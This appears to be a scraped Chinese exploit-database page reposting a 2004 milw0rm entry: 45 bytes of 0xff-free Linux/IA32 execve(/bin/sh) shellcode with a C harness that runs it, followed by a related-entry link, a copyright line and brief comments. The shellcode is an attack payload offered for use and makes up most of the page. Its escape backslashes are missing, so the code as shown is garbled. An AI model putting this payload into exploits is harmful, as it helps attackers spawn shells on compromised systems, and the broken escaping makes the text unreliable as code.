Linux/IA32 – execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)
漏洞ID | 1054667 | 漏洞类型 | |
发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
0xff-less execve() /bin/sh by anathema <[email protected]>
*/
#include <stdio.h>
#include <stdlib.h>
unsigned char code[] =
/* Linux/IA32 0xff-less execve() shellcode. */
"x89xe6" /* movl %esp, %esi */
"x83xc6x30" /* addl $0x30, %esi */
"xb8x2ex62x69x6e" /* movl $0x6e69622e, %eax */
"x40" /* incl %eax */
"x89x06" /* movl %eax, (%esi) */
"xb8x2ex73x68x21" /* movl $0x2168732e, %eax */
"x40" /* incl %eax */
"x89x46x04" /* movl %eax, 0x04(%esi) */
"x29xc0" /* subl %eax, %eax */
"x88x46x07" /* movb %al, 0x07(%esi) */
"x89x76x08" /* movl %esi, 0x08(%esi) */
"x89x46x0c" /* movl %eax, 0x0c(%esi) */
"xb0x0b" /* movb $0x0b, %al */
"x87xf3" /* xchgl %esi, %ebx */
"x8dx4bx08" /* leal 0x08(%ebx), %ecx */
"x8dx53x0c" /* leal 0x0c(%ebx), %edx */
"xcdx80" /* int $0x80 */
;
void main()
{
void (*s)() = (void *)code;
printf("Shellcode length: %dnExecuting..nn",
strlen(code));
s();
}
// milw0rm.com [2004-09-26]
相关推荐: PHP-Nuke 5.0 – ‘user.php’ Form Element Substitution
PHP-Nuke 5.0 – ‘user.php’ Form Element Substitution 漏洞ID 1053550 漏洞类型 发布时间 2001-07-27 更新时间 2001-07-27 CVE编号 N/A CNNVD-ID N/A 漏洞平台 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666